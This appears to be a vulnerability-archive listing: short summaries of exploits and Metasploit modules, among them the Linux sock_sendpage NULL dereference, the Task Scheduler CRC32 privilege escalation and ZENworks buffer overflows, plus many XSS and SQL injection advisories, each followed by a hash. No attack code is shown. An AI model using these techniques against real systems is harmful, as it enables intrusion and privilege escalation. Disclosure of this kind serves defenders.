The Linux kernel failed to properly initialize some entries the proto_ops struct for several protocols, leading to NULL being derefenced and used as a function pointer. By using mmap(2) to map page 0, an attacker can execute arbitrary code in the context of the kernel. Several public exploits exist for this vulnerability, including spender's wunderbar_emporium and rcvalle's ppc port, sock_sendpage.c. All Linux 2.4/2.6 versions since May 2001 are believed to be affected: 2.4.4 up to and including 2.4.37.4; 2.6.0 up to and including 2.6.30.4
9bd69f05ada8cee6b76af8cc4636ab3a3a49a49bfad809f7b97fefaea4e48bb0
This Metasploit module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet. When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with. Also, In a default configuration, normal users can read and write the task files that they have created. By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges.
d58b245a3284a4c3a0c953e6cd974d43047680186d9ff32f042bd97e492059fb
This Metasploit module exploits a remote buffer overflow in the ZENworks Configuration Management 10 SP2. The vulnerability exists in the Preboot service and can be triggered by sending a specially crafted packet with the opcode 0x06 (PROXY_CMD_CLEAR_WS) to the 998/TCP port. The module has been successfully tested on Novell ZENworks Configuration Management 10 SP2 and Windows Server 2003 SP2 (DEP bypass).
d8e51661349a2d58c55ebba98e0aab7bf40252bcd11e9570670dbb09e98a4244
This Metasploit module exploits a remote buffer overflow in the ZENworks Configuration Management 10 SP2. The vulnerability exists in the Preboot service and can be triggered by sending a specially crafted packet with the opcode 0x21 (PROXY_CMD_FTP_FILE) to port 998/TCP. The module has been successfully tested on Novell ZENworks Configuration Management 10 SP2 and Windows Server 2003 SP2 (DEP bypass).
10965ccc1d7f3bdfb1cdc1edf6199b5eb01250bbec68ab0ee4cf54ba20262a61
Nmap's man page mentions that "Nmap should never be installed with special privileges (e.g. suid root) for security reasons.." and specifically avoids making any of its binaries setuid during installation. Nevertheless, administrators sometimes feel the need to do insecure things. This Metasploit module abuses a setuid nmap binary by writing out a lua nse script containing a call to os.execute(). Note that modern interpreters will refuse to run scripts on the command line when EUID != UID, so the cmd/unix/reverse_{perl,ruby} payloads will most likely not work.
36e5626623975013ad17de674718bb242f7551a7c65755515d9aab44a7aa57ea
WordPress Cimy User Extra Fields plugin version 2.3.7 suffers from a remote shell upload vulnerability.
3f1cf0c011392b255cd32e6cfb0a2527d78eaaba00b4a507ae004527751b8cc7
ClipBucket version 2 suffers from a remote blind SQL injection vulnerability. Note that this finding houses site-specific data.
908a1ea098afb0afffccbe3d11106c241ae2a4f161d8387e327501693cbf137d
Arora Browser version 0.10.2 remote denial of service proof of concept exploit.
87264302a9bde89050e168e8b2b9679fc2b02cd931240a0e758de293a46e69fa
KeyPass Password Safe version 1.22 suffers from a filter bypass that allows for malicious script code insertion.
fc0a3a882993015dc7a091e373423dcc5d79e487f44fafbaf9d5dd68199ebf13
AVAVoIP version 1.5.12 suffers from cross site scripting and remote shell upload vulnerabilities.
8599e60b92e8454a5283310d93c784484aaad81f0c9a8880f0042a731bd9023d
WordPress plugin Count Per Day version 3.1.1 suffers from multiple cross site scripting vulnerabilities.
28361cdd395c57304d759e3a7c3969bfc5d760b11accedd798ecce30a9dacbee
MGB OpenSource Guestbook version 0.6.9.1 suffers from cross site scripting and remote SQL injection vulnerabilities.
e30d0db62fbca895bd77c358db965a0d775079ae38b45f678fdec8aa710f86ac
Metasploit plugin 'pcap_log' is vulnerable to an arbitrary file overwrite bug which can further be leveraged to insert user-controlled data resulting in potential escalation of privileges. Metasploit module included.
a3608689ff5f6a56679189ea8149e0e805de1c706fb7d3fedff592abe11d622b
easyCMSlite version 1.0.9 suffers from a remote database information disclosure vulnerability.
d76b243f67795b89da6846818d5643c0c788edbdf1c583ff25b07a351804feaa
Google Chrome developers, while trying to be adaptive and current, added some windows 8 helper functions to aid the development of Metro style behavior, but does not include the library file itself, thus resulting in an unqualified dynamic-link library call to 'metro_driver.dll'. A user with local disk access can carefully construct a DLL that suits the pattern that is being traversed by the client and implement it somewhere along the search path and the client will load it seamlessly.
dbb9d62577ac5b978fa6419192db9f6b4808436e28a90885a8548c968b26a7d8
Vivotek Cameras suffer from a configuration disclosure vulnerability that leaks password information.
d058e2a1787927c136f919f18b911e8101c71269a4d32b051967630ea19ce337
CakePHP versions 2.x through 2.2.0-RC2 suffer from a XXE injection vulnerability.
54d1c4dda8e08667e5b5c0da52af3bfbbf429c685ad10b6ddb43edebd154ffb5
DomsHttpd versions 1.0 and below suffer from a remote denial of service vulnerability.
df48c1ebd005e29be57fe7d977ca199ab00f6e3cc3896927df8c2e16e4d2d267
This Metasploit module exploits a stack buffer overflow in ALLMediaServer 0.8. The vulnerability is caused due to a boundary error within the handling of HTTP request. While the exploit supports DEP bypass via ROP, on Windows 7 the stack pivoting isn't reliable across virtual (VMWare, VirtualBox) and physical environments. Because of this the module isn't using DEP bypass on the Windows 7 SP1 target, where by default DEP is OptIn and AllMediaServer won't run with DEP.
cd224eb091bd83cac2f6867238fdeea0e253250295ed9b0257c0173e71de0311
Cura is a mobile phone application bundle of remote systems administration tools. It provides a personalized terminal emulator, a syslog module that allows for reading logs directly from a server, a SysMonitor module that visually graphs CPU and RAM usage percentages, access to Nmap, and Server Stats will offer general server information like its Vitals, Hardware information, Memory information, processes, and so on. A security feature will be implemented that allows users to have Cura's database completely wiped upon them sending the compromised phone a secret pattern of their choosing (e.g. send an SMS message containing "phone has been stolen!" to your Android phone to wipe Cura's database, and receive the location of the compromised phone as an SMS to your emergency phone number or as an email to your emergency email address).
1701fc58dc21a0ecb6c45f4836abb5e380f5e8214af1f3d389ec0e35ee46a019
Blackboard Mobile Learn version 3.0 suffers from a persistent cross site scripting vulnerability.
b4e651e38bbb3294f231eb8e3bb086bfc5350b4b6edc00836d34547e9116fdee
PBBoard CMS version 2.1.4 suffers from cross site request forgery and cross site scripting vulnerabilities.
3504eeef961d0a59f49c9ee08fb6ee83c790ce14364fa6fe2751a1e2eab9d1a9
SMF Board version 2.0.2 suffers from multiple cross site scripting vulnerabilities.
c9ae40521ca14dc1b3769503b4731284c9910f6abe411ca09d1b0b085880e22c
Lepton CMS version 1.2.0 suffers from multiple cross site scripting vulnerabilities.
a1950761b16455f0831bfaca8919628053e40986ef93c4860bbb883b3dd0f353
Event Calendar PHP version 1.2 suffers from cross site scripting and remote SQL injection vulnerabilities.
3ad4f5c685a677a797142b6d779de69baf513ebfcb1464004b838916e0b78d0f